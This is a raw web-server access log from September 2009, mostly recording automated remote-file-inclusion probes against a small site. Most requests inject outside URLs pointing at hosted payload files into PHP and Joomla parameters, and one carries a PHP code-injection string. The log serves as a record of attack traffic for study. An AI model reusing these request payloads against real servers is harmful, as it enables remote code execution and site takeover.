174.37.136.126 - - [07/Sep/2009:10:58:42 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:10:58:42 -0700] "GET /logs/access_080529.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:58:46 -0700] "GET /logs/access_090523.log/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:58:46 -0700] "GET /logs/access_080212.log/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:58:46 -0700] "GET /myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:58:46 -0700] "GET /logs/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:03 -0700] "GET /logs/access_080515.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:05 -0700] "GET /logs/access_081111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:17 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:17 -0700] "GET /logs/access_080525.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:18 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:24 -0700] "GET /logs/access_080529.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:25 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:26 -0700] "GET /logs/access_080525.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:26 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:10:59:29 -0700] "GET /logs/access_080529.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:59:30 -0700] "GET /logs/access_090523.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:59:30 -0700] "GET /logs/access_080212.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:42 -0700] "GET /logs/access_090122.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:42 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:43 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:59:49 -0700] "GET /logs/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:59:49 -0700] "GET /myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:59:49 -0700] "GET /logs/access_090523.log/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:59:49 -0700] "GET /logs/access_080212.log/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:57 -0700] "GET /logs/access_090122.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:57 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:57 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:10:59:58 -0700] "GET /logs/access_090621.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:59 -0700] "GET /logs/access_090122.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:59 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:59:59 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:00:04 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:00:07 -0700] "GET /logs/access_090122.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:00:07 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:00:07 -0700] "GET /logs/access_090717.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:00:13 -0700] "GET /logs/access_090819.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:00:15 -0700] "GET /logs/access_090717.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:00:19 -0700] "GET /logs/access_090717.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:00:25 -0700] "GET /logs/access_090523.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:00:25 -0700] "GET /logs/access_080212.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:00:41 -0700] "GET /logs/access_080525.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:00:41 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:00:41 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:00:42 -0700] "GET /logs/access_080525.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:00:42 -0700] "GET /logs/access_080529.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:00:45 -0700] "GET /logs/access_080529.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [07/Sep/2009:11:00:47 -0700] "GET /logs/access_080313.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.119.209 - - [07/Sep/2009:11:00:57 -0700] "GET /admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.119.209 - - [07/Sep/2009:11:00:58 -0700] "GET /logs/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.119.209 - - [07/Sep/2009:11:00:58 -0700] "GET /logs/access_080429.log/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.119.209 - - [07/Sep/2009:11:00:58 -0700] "GET /logs/access_080424.log/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [07/Sep/2009:11:01:19 -0700] "GET /logs/access_080313.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [07/Sep/2009:11:01:20 -0700] "GET /logs/access_080313.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:01:23 -0700] "GET /myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:01:23 -0700] "GET /logs/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:01:23 -0700] "GET /logs/access_090523.log/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:01:23 -0700] "GET /logs/access_080212.log/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:01:31 -0700] "GET /logs/access_090523.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:01:32 -0700] "GET /logs/access_080212.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:01:35 -0700] "GET /logs/access_090717.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:02:40 -0700] "GET /logs/access_080525.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:02:43 -0700] "GET /logs/access_080529.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:02:52 -0700] "GET /logs/access_080525.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:02:55 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:02:56 -0700] "GET /logs/access_080529.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:03:00 -0700] "GET /logs/access_090523.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:03:00 -0700] "GET /logs/access_080212.log%20%20/myevent.php?myevent_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:03:28 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:03:29 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:31 -0700] "GET /logs/access_080906.log/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:31 -0700] "GET /logs/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 116204 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:32 -0700] "GET /logs/access_090122.log/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:34 -0700] "GET /?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 19918 "-" "libwww-perl/5.805" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:03:34 -0700] "GET /logs/access_080819.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:03:34 -0700] "GET /logs/access_090326.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:36 -0700] "GET /logs/access_080906.log/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:36 -0700] "GET /?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 19917 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:36 -0700] "GET /logs/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 200 116204 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:11:03:36 -0700] "GET /logs/access_090511.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.6.232.171 - - [07/Sep/2009:11:03:36 -0700] "GET /logs/access_090122.log/?INCLUDE_FOLDER=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:11:03:37 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:11:03:37 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:03:39 -0700] "GET /logs/access_070831.log HTTP/1.0" 200 35113 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:03:39 -0700] "GET /logs/access_090511.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:11:03:50 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:04:02 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:04:03 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:04:03 -0700] "GET /logs/access_081210.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.254.195.7 - - [07/Sep/2009:11:04:13 -0700] "GET /logs/access_080906.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:04:23 -0700] "GET /logs/access_081210.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:04:23 -0700] "GET /logs/access_090714.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:04:23 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:04:23 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:04:27 -0700] "GET /logs/access_090511.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:05:40 -0700] "GET /logs/access_090322.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:05:40 -0700] "GET /logs/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [07/Sep/2009:11:05:41 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:05:42 -0700] "GET /?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 19921 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:01 -0700] "GET /logs/access_090509.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:01 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:02 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:02 -0700] "GET /logs/access_090509.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:02 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:06:04 -0700] "GET /logs/access_090306.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:05 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:05 -0700] "GET /logs/access_090509.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:05 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:06:05 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:07 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:06:11 -0700] "GET /logs/access_090322.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:06:11 -0700] "GET /?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:06:11 -0700] "GET /logs/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:06:14 -0700] "GET /logs/access_090503.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:18 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:18 -0700] "GET /logs/access_090509.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:19 -0700] "GET /logs/access_090714.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:24 -0700] "GET /logs/access_090714.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:26 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
